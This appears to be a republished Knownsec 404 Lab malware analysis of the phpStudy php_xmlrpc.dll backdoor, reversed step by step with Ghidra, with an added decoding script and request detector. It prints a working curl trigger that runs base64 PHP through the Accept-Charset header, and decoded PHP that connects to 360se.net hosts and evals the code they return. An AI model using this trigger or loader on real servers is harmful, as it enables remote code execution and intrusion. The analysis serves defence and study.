2025-01-28 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/01 Report--
Author: lu4nx @ Knownsec 404 Active Defense Lab
The author's blog post: "Using Ghidra to analyze the phpStudy backdoor"
Original link: https://paper.seebug.org/1058/
It has been a few days since this incident and the response work is done. Although many vendors and organizations have published analyses online, few of them record the analysis process itself. I simply want to use Ghidra to analyze it carefully from beginning to end.
1 Tools and platforms
Main tools:
Kali Linux
Ghidra 9.0.4
010Editor 9.0.2
Sample environment:
Windows 7
phpStudy 20180211
2 Analysis process
First install PhpStudy 20180211 in the Windows 7 virtual machine, and then copy the directory after installation to Kali Linux.
According to information made public online, the backdoor is in the file php_xmlrpc.dll, which contains the keyword "eval"; the MD5 of the backdoored file is c339482fd2b233fb0a555b629c0ea5d5.
So, first locate the file containing the backdoor:
lu4nx@lx-kali:/tmp/phpStudy$ find ./ -name php_xmlrpc.dll -exec md5sum {} \;
3d2c61ed73e9bb300b52a0555135f2f7  ./PHPTutorial/php/php-7.2.1-nts/ext/php_xmlrpc.dll
7c24d796e0ae34e665adcc6a1643e132  ./PHPTutorial/php/php-7.1.13-nts/ext/php_xmlrpc.dll
3ff4ac19000e141fef07b0af5c36a5a3  ./PHPTutorial/php/php-5.4.45-nts/ext/php_xmlrpc.dll
c339482fd2b233fb0a555b629c0ea5d5  ./PHPTutorial/php/php-5.4.45/ext/php_xmlrpc.dll
5db2d02c6847f4b7e8b4c93b16bc8841  ./PHPTutorial/php/php-7.0.12-nts/ext/php_xmlrpc.dll
42701103137121d2a2afa7349c233437  ./PHPTutorial/php/php-5.3.29-nts/ext/php_xmlrpc.dll
0f7ad38e7a9857523dfbce4bce43a9e9  ./PHPTutorial/php/php-5.2.17/ext/php_xmlrpc.dll
149c62e8c2a1732f9f078a7d17baed00  ./PHPTutorial/php/php-5.5.38/ext/php_xmlrpc.dll
fc118f661b45195afa02cbf9d2e57754  ./PHPTutorial/php/php-5.6.27-nts/ext/php_xmlrpc.dll
Copy the file ./PHPTutorial/php/php-5.4.45/ext/php_xmlrpc.dll out on its own and confirm that it contains the backdoor:
lu4nx@lx-kali:/tmp/phpStudy$ strings ./PHPTutorial/php/php-5.4.45/ext/php_xmlrpc.dll | grep eval
zend_eval_string
@eval(%s('%s'));
%s;@eval(%s('%s'));
From the search results above you can see three strings containing "eval" in the file; now load the file into Ghidra for analysis.
Search in Ghidra: choose Search > For Strings from the menu bar, press "Search" in the pop-up dialog, and then filter for "eval" in the results window's filter box, as shown in the figure:
From the "Code" column of the results you can see that all three strings are in the data section of the file. Pick any one (I chose "@eval(%s('%s'));"), double-click to jump to its address, and look at where the string is referenced (right-click, References > Show References to Address), as shown in the figure:
The results are as follows:
You can see that this data is used in a PUSH instruction, so it should be a function call argument; double-click to jump to the assembly instruction, and Ghidra automatically converts the assembly into higher-level pseudocode and shows it in the Decompile window:
If you do not see the Decompile window, open it in the menu Window > Decompile.
In the decompiled function FUN_100031f0 I found the three eval strings I searched for earlier, which suggests there may be several backdoors in this function (after the full analysis there turn out to be three).
As an aside, Ghidra's decompilation to high-level code is worse than IDA's Hex-Rays Decompiler plug-in. For example, Ghidra produces this:
puVar8 = local_19f;
while (iVar5 != 0) {
  iVar5 = iVar5 + -1;
  *puVar8 = 0;
  puVar8 = puVar8 + 1;
}
In IDA the translation is very intuitive:
memset(&v27, 0, 0xB0u);
The same goes for compound conditions, which IDA translates as:
if (a && b) { ... }
while Ghidra turns them into:
if (a) { if (b) { ... } }
Nested ifs like this are easy to get lost in when reading. In short, I only understood what the Ghidra output was doing after reading it over and over, and it took me hours to work through this kind of code.
2.1 The first backdoor: remote code execution
The first backdoor exists in this code:
uVar6 = 0xffffffff;
pcVar9 = s__SERVER_1000ec9c;
do {
  if (uVar6 == 0) break;
  uVar6 = uVar6 - 1;
  cVar1 = *pcVar9;
  pcVar9 = pcVar9 + 1;
} while (cVar1 != '\0');
iVar5 = zend_hash_find(*(int *)(*param_3 + -4 + *(int *)executor_globals_id_exref * 4) + 0xd8, s__SERVER_1000ec9c, ~uVar6, &local_14);
if (iVar5 != -1) {
  uVar6 = 0xffffffff;
  pcVar9 = s_HTTP_ACCEPT_ENCODING_1000ec84;
  do {
    if (uVar6 == 0) break;
    uVar6 = uVar6 - 1;
    cVar1 = *pcVar9;
    pcVar9 = pcVar9 + 1;
  } while (cVar1 != '\0');
  iVar5 = zend_hash_find(*(undefined4 *)*local_14, s_HTTP_ACCEPT_ENCODING_1000ec84, ~uVar6, &local_28);
  if (iVar5 != -1) {
    pcVar9 = *(char **)*local_28;
    pbVar7 = pbVar4;
    do {
      bVar2 = *pbVar7;
      bVar11 = bVar2 < (byte)*pcVar9;
      if (bVar2 != *pcVar9) {
LAB_10003303:
        iVar5 = (1 - (uint)bVar11) - (uint)(bVar11 != false);
        goto LAB_10003308;
      }
      if (bVar2 == 0) break;
      bVar2 = pbVar7[1];
      bVar11 = bVar2 < ((byte *)pcVar9)[1];
      if (bVar2 != ((byte *)pcVar9)[1]) goto LAB_10003303;
      pbVar7 = pbVar7 + 2;
      pcVar9 = (char *)((byte *)pcVar9 + 2);
    } while (bVar2 != 0);
    iVar5 = 0;
LAB_10003308:
    if (iVar5 == 0) {
      uVar6 = 0xffffffff;
      pcVar9 = s__SERVER_1000ec9c;
      do {
        if (uVar6 == 0) break;
        uVar6 = uVar6 - 1;
        cVar1 = *pcVar9;
        pcVar9 = pcVar9 + 1;
      } while (cVar1 != '\0');
      iVar5 = zend_hash_find(*(int *)(*param_3 + -4 + *(int *)executor_globals_id_exref * 4) + 0xd8, s__SERVER_1000ec9c, ~uVar6, &local_14);
      if (iVar5 != -1) {
        uVar6 = 0xffffffff;
        pcVar9 = s_HTTP_ACCEPT_CHARSET_1000ec60;
        do {
          if (uVar6 == 0) break;
          uVar6 = uVar6 - 1;
          cVar1 = *pcVar9;
          pcVar9 = pcVar9 + 1;
        } while (cVar1 != '\0');
        iVar5 = zend_hash_find(*(undefined4 *)*local_14, s_HTTP_ACCEPT_CHARSET_1000ec60, ~uVar6, &local_1c);
        if (iVar5 != -1) {
          uVar6 = 0xffffffff;
          pcVar9 = *(char **)*local_1c;
          do {
            if (uVar6 == 0) break;
            uVar6 = uVar6 - 1;
            cVar1 = *pcVar9;
            pcVar9 = pcVar9 + 1;
          } while (cVar1 != '\0');
          local_10 = FUN_100040b0((int)*(char **)*local_1c, ~uVar6 - 1);
          if (local_10 != (undefined4 *)0x0) {
            iVar5 = *(int *)(*param_3 + -4 + *(int *)executor_globals_id_exref * 4);
            local_24 = *(undefined4 *)(iVar5 + 0x128);
            *(undefined **)(iVar5 + 0x128) = local_ec;
            iVar5 = _setjmp3(local_ec, 0);
            uVar3 = local_24;
            if (iVar5 == 0) {
              zend_eval_string(local_10, 0, &DAT_10012884, param_3);
            } else {
              *(undefined4 *)(*(int *)(*param_3 + -4 + *(int *)executor_globals_id_exref * 4) + 0x128) = local_24;
            }
            *(undefined4 *)(*(int *)(*param_3 + -4 + *(int *)executor_globals_id_exref * 4) + 0x128) = uVar3;
          }
        }
      }
    }
  }
}
This is very hard to read, but the rough logic is: use PHP's zend_hash_find function to look up the $_SERVER variable, then find the two HTTP request headers Accept-Encoding and Accept-Charset; if the value of Accept-Encoding is gzip,deflate, call zend_eval_string to execute the content derived from Accept-Charset:
zend_eval_string(local_10, 0, &DAT_10012884, param_3);
Here zend_eval_string executes the content of the variable local_10, and local_10 is assigned by calling a function:
local_10 = FUN_100040b0((int)*(char **)*local_1c, ~uVar6 - 1);
The function FUN_100040b0 turns out, after analysis, to do Base64 decoding. At this point it is clear how the payload is constructed:
Accept-Encoding: gzip,deflate
Accept-Charset: Base64-encoded PHP code
Send a request to the virtual machine:
$ curl -H "Accept-Charset: $(echo 'system("ipconfig");' | base64)" -H 'Accept-Encoding: gzip,deflate' 192.168.128.6
The result is shown in the figure:
2.2 The second backdoor
Continuing along the pseudocode, we come to this code:
if (iVar5 == 0) {
  puVar8 = &DAT_1000d66c;
  local_8 = &DAT_10012884;
  piVar10 = &DAT_1000d66c;
  do {
    if (*piVar10 == 0x27) {
      (&DAT_10012884)[iVar5] = 0x5c;
      (&DAT_10012885)[iVar5] = *(undefined *)puVar8;
      iVar5 = iVar5 + 2;
      piVar10 = piVar10 + 2;
    } else {
      (&DAT_10012884)[iVar5] = *(undefined *)puVar8;
      iVar5 = iVar5 + 1;
      piVar10 = piVar10 + 1;
    }
    puVar8 = puVar8 + 1;
  } while ((int)puVar8 < 0x1000e5c4);
  spprintf(&local_20, 0, s_$V='%s';$M='%s';_1000ec3c, &DAT_100127b8, &DAT_10012784);
  spprintf(&local_8, 0, s_%s;@eval(%s('%s'));_1000ec28, local_20, s_gzuncompress_1000d018, local_8);
  iVar5 = *(int *)(*param_3 + -4 + *(int *)executor_globals_id_exref * 4);
  local_10 = *(undefined4 **)(iVar5 + 0x128);
  *(undefined **)(iVar5 + 0x128) = local_6c;
  iVar5 = _setjmp3(local_6c, 0);
  uVar3 = local_10;
  if (iVar5 == 0) {
    zend_eval_string(local_8, 0, &DAT_10012884, param_3);
  } else {
    *(undefined4 **)(*(int *)(*param_3 + -4 + *(int *)executor_globals_id_exref * 4) + 0x128) = local_10;
  }
  *(undefined4 *)(*(int *)(*param_3 + -4 + *(int *)executor_globals_id_exref * 4) + 0x128) = uVar3;
  return 0;
}
The key part is this section:
puVar8 = &DAT_1000d66c;
local_8 = &DAT_10012884;
piVar10 = &DAT_1000d66c;
do {
  if (*piVar10 == 0x27) {
    (&DAT_10012884)[iVar5] = 0x5c;
    (&DAT_10012885)[iVar5] = *(undefined *)puVar8;
    iVar5 = iVar5 + 2;
    piVar10 = piVar10 + 2;
  } else {
    (&DAT_10012884)[iVar5] = *(undefined *)puVar8;
    iVar5 = iVar5 + 1;
    piVar10 = piVar10 + 1;
  }
  puVar8 = puVar8 + 1;
} while ((int)puVar8 < 0x1000e5c4);
The variable puVar8 acts as a running cursor, and this code looks like it copies the data between addresses 0x1000d66c and 0x1000e5c4 (every 0x27, a single quote, is prefixed with 0x5c, a backslash, so the copied data can sit inside the quoted string that spprintf builds). So select this line:
puVar8 = &DAT_1000d66c;
Double-click DAT_1000d66c and Ghidra jumps to that address; then choose Window > Bytes from the menu to open the hexadecimal window. Now at address 0x1000d66c, the next step is to copy the data in the range 0x1000d66c~0x1000e5c4:
Choose Select > Bytes from the menu.
Tick "To Address" in the pop-up window, then enter 0x1000e5c4 in the "Ending Address" field on the right, as shown in the figure:
After pressing Enter the data is selected. To copy it out on its own, right-click and choose Copy Special > Byte String (No Spaces), as shown in the figure:
Then open 010Editor:
New file: File > New > New Hex File
Paste the copied hexadecimal data: Edit > Paste From > Paste from Hex Text
Then remove all the "00" bytes: choose Search > Replace, search for 00, leave the replacement empty, and click "Replace All". After processing it looks like this:
Save the processed file as p1. The file command reports that p1 is zlib-compressed data:
$ file p1
p1: zlib compressed data
It can be decompressed with Python's zlib module. The decompression code is as follows:
import zlib

# read the extracted bytes and inflate the zlib stream
with open("p1", "rb") as f:
    data = f.read()
print(zlib.decompress(data))
Running it gives:
lu4nx@lx-kali:/tmp$ python3 decom.py
b"$iFO 'info^ _ ^' .Base64 _ encode ($V.indoor. Info.com').'= = END==' $zzz='- - --' @eval(base64_decode('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'));"
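The 010Editor and zlib steps above, plus the base64 stage that follows, carried out as one script. This is an added example, not code from the original article: the sample blob is constructed here (a harmless stand-in for the real inner PHP, wrapped in the article's @eval(base64_decode('...')) form, zlib-compressed and padded with junk bytes), and the zlib-header scan is my own approach; the article's "delete every 00 byte" trick is kept only as a fallback because it corrupts a stream that itself contains 00 bytes.

```python
import base64
import re
import zlib

# Constructed sample: stand-in for the second backdoor's inner PHP, wrapped
# the way the article shows it, compressed, and surrounded by junk bytes.
INNER_PHP = b'@ini_set("display_errors", "0"); error_reporting(0); echo "constructed sample";'
STAGE = b"@eval(base64_decode('" + base64.b64encode(INNER_PHP) + b"'));"
SAMPLE_BLOB = b"\x00\x00\x05\x01" + zlib.compress(STAGE) + b"\x00\x00\x00"

ZLIB_HEADERS = (b"\x78\x01", b"\x78\x5e", b"\x78\x9c", b"\x78\xda")
EVAL_B64 = re.compile(rb"@eval\(base64_decode\('([A-Za-z0-9+/=]+)'\)\)")


def find_zlib_stream(blob):
    """Inflate from the first plausible zlib header; trailing junk is ignored
    because decompressobj stops at the end of the stream."""
    for i in range(len(blob) - 1):
        if blob[i:i + 2] in ZLIB_HEADERS:
            d = zlib.decompressobj()
            try:
                out = d.decompress(blob[i:]) + d.flush()
                if d.eof:
                    return out
            except zlib.error:
                continue  # false header candidate, keep scanning
    return None


def decompress_stage(blob):
    """Header scan first; only if that fails, fall back to the article's
    method of deleting every 00 byte (lossy if the stream contains 00s)."""
    out = find_zlib_stream(blob)
    if out is None:
        out = find_zlib_stream(blob.replace(b"\x00", b""))
    return out


def extract_inner_php(blob):
    """Return the PHP hidden behind @eval(base64_decode('...')), or None."""
    stage = decompress_stage(blob)
    if stage is None:
        return None
    m = EVAL_B64.search(stage)
    return base64.b64decode(m.group(1)) if m else None


if __name__ == "__main__":
    print(extract_inner_php(SAMPLE_BLOB))
```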
Decode this Base64 code with the base64 command; the process and result are as follows:
lu4nx@lx-kali:/tmp$ echo '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' | base64 -d
@ini_set("display_errors", "0");
error_reporting(0);
function tcpGet($sendMsg = '', $ip = '360se.net', $port = '20123') {
    $result = "";
    $handle = stream_socket_client("tcp://{$ip}:{$port}", $errno, $errstr, 10);
    if (!$handle) {
        $handle = fsockopen($ip, intval($port), $errno, $errstr, 5);
        if (!$handle) {
            return "err";
        }
    }
    fwrite($handle, $sendMsg . "\n");
    while (!feof($handle)) {
        stream_set_timeout($handle, 2);
        $result .= fread($handle, 1024);
        $info = stream_get_meta_data($handle);
        if ($info['timed_out']) {
            break;
        }
    }
    fclose($handle);
    return $result;
}
$ds = array("www", "bbs", "cms", "down", "up", "file", "ftp");
$ps = array("20123", "40125", "8080", "80", "53");
$n = false;
do {
    $n = false;
    foreach ($ds as $d) {
        $b = false;
        foreach ($ps as $p) {
            $result = tcpGet($i, $d . ".360se.net", $p);
            if ($result != "err") {
                $b = true;
                break;
            }
        }
        if ($b) break;
    }
    $info = explode("", $result);
    if (count($info) == 4) {
        if (strpos($info[3], "/*Onemore*/") !== false) {
            $info[3] = str_replace("/*Onemore*/", "", $info[3]);
            $n = true;
        }
        @eval($info[3]);
    }
} while ($n);
2.3 The third backdoor
The third backdoor has similar logic to the second; the code is as follows:
puVar8 = &DAT_1000d028;
local_c = &DAT_10012884;
iVar5 = 0;
piVar10 = &DAT_1000d028;
do {
  if (*piVar10 == 0x27) {
    (&DAT_10012884)[iVar5] = 0x5c;
    (&DAT_10012885)[iVar5] = *(undefined *)puVar8;
    iVar5 = iVar5 + 2;
    piVar10 = piVar10 + 2;
  } else {
    (&DAT_10012884)[iVar5] = *(undefined *)puVar8;
    iVar5 = iVar5 + 1;
    piVar10 = piVar10 + 1;
  }
  puVar8 = puVar8 + 1;
} while ((int)puVar8 < 0x1000d66c);
spprintf(&local_c, 0, s_@eval(%s('%s'));_1000ec14, /* remaining arguments garbled in extraction */);
iVar5 = *(int *)(*param_3 + -4 + *(int *)executor_globals_id_exref * 4);
local_18 = *(undefined4 *)(iVar5 + 0x128);
*(undefined **)(iVar5 + 0x128) = local_ac;
iVar5 = _setjmp3(local_ac, 0);
uVar3 = local_18;
if (iVar5 == 0) {
  zend_eval_string(local_c, 0, &DAT_10012884, param_3);
}
The key part is this section:
puVar8 = &DAT_1000d028;
local_c = &DAT_10012884;
iVar5 = 0;
piVar10 = &DAT_1000d028;
do {
  if (*piVar10 == 0x27) {
    (&DAT_10012884)[iVar5] = 0x5c;
    (&DAT_10012885)[iVar5] = *(undefined *)puVar8;
    iVar5 = iVar5 + 2;
    piVar10 = piVar10 + 2;
  } else {
    (&DAT_10012884)[iVar5] = *(undefined *)puVar8;
    iVar5 = iVar5 + 1;
    piVar10 = piVar10 + 1;
  }
  puVar8 = puVar8 + 1;
} while ((int)puVar8 < 0x1000d66c);
The backdoor code lives at addresses 0x1000d028~0x1000d66c, and the extraction and processing method is the same as for the second backdoor. Extracting it gives the following:
lu4nx@lx-kali:/tmp$ python3 decom.py
b"@eval(base64_decode('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'));"
Decode this Base64 code:
lu4nx@lx-kali:/tmp$ echo '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' | base64 -d
@ini_set("display_errors", "0");
error_reporting(0);
$h = $_SERVER['HTTP_HOST'];
$p = $_SERVER['SERVER_PORT'];
$fp = fsockopen($h, $p, $errno, $errstr, 5);
if (!$fp) {
} else {
    $out = "GET {$_SERVER['SCRIPT_NAME']} HTTP/1.1\r\n";
    $out .= "Host: {$h}\r\n";
    $out .= "Accept-Encoding: compress,gzip\r\n";
    $out .= "Connection: Close\r\n\r\n";
    fwrite($fp, $out);
    fclose($fp);
}
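A request-level check for the first backdoor's trigger from section 2.1, as an added example that is not from the original article. It applies the same two conditions the decompiled code applies (Accept-Encoding exactly equal to gzip,deflate, then a base64-decodable Accept-Charset) and only then looks for PHP in the decoded text, so a browser's ordinary "utf-8" charset never flags. The header dicts are constructed here and the list of PHP markers is my own assumption.

```python
import base64
import re

# Markers that make decoded Accept-Charset text look like PHP (assumed list).
PHP_MARKERS = re.compile(
    rb"(<\?php|\$_(GET|POST|SERVER|REQUEST)\b|"
    rb"\b(eval|system|exec|passthru|shell_exec|assert)\s*\()"
)

# Constructed requests (header names lower-cased, as a log parser would emit).
SAMPLE_HIT = {
    "accept-encoding": "gzip,deflate",
    "accept-charset": base64.b64encode(b'system("ipconfig");').decode(),
}
SAMPLE_BROWSER = {"accept-encoding": "gzip, deflate, br", "accept-charset": "utf-8"}
SAMPLE_B64_CHARSET = {"accept-encoding": "gzip,deflate", "accept-charset": "dXRmLTg="}


def decode_charset_payload(value):
    """Mirror the backdoor's own decode step (FUN_100040b0 is base64 decoding):
    return the decoded bytes, or None when the header is not valid base64."""
    try:
        return base64.b64decode(value.strip(), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def is_backdoor_trigger(headers):
    """Return (flagged, decoded_payload). flagged is True only when every
    condition the binary checks holds and the decoded text contains PHP."""
    # The binary does an exact byte compare, so "gzip, deflate" (with a space)
    # would not reach zend_eval_string.
    if headers.get("accept-encoding", "").strip() != "gzip,deflate":
        return False, None
    charset = headers.get("accept-charset")
    if not charset:
        return False, None
    payload = decode_charset_payload(charset)
    if payload is None or not PHP_MARKERS.search(payload):
        return False, None
    return True, payload


def scan_requests(requests):
    """Indices of requests that look like attempts to use the first backdoor."""
    return [i for i, h in enumerate(requests) if is_backdoor_trigger(h)[0]]
```

Feed it header dicts parsed from an access log or a reverse-proxy capture; exact-match on Accept-Encoding keeps false positives from normal browsers near zero.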